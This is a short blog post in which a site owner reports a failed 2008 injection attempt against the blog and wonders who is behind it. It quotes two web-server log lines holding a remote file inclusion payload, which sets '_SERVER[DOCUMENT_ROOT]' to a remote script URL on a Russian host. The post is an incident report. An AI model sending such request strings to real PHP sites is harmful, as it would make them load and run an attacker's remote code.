Blog » Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?

Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?

Hot on the heels of the last code injection attempt comes another one; this time the attempt to breach security appears to have a Russian connection. The new log entries are as follows:

  • 195.2.72.173 - - [24/Jul/2008:20:06:15 -0400] "GET /bot-attack//?_SERVER[DOCUMENT_ROOT]=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 200 19824 "-" "libwww-perl/5.63"

  • 195.2.72.173 - - [24/Jul/2008:20:06:16 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 200 11961 "-" "libwww-perl/5.63"

Ironically, this latest attempt targets the blog entry about the previous attempt. The questions that remains are:

  • Who is responsible for this (i.e., who owns http://www.proxi-com.ru/mambots/readme.txt)?
  • What exactly would happen if this attach were successful?
  • How can those responsible be stopped?
Whilst this attack was once again unsuccessful, it would be nice to be able to track down the perpetrators and have them shut down. 



Blog » Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?

Post your comment

Comments

No one has commented on this page yet.

RSS feed for comments on this page | RSS feed for all comments


Blog » Who Owns http://www.proxi-com.ru/mambots/, and What do they Want?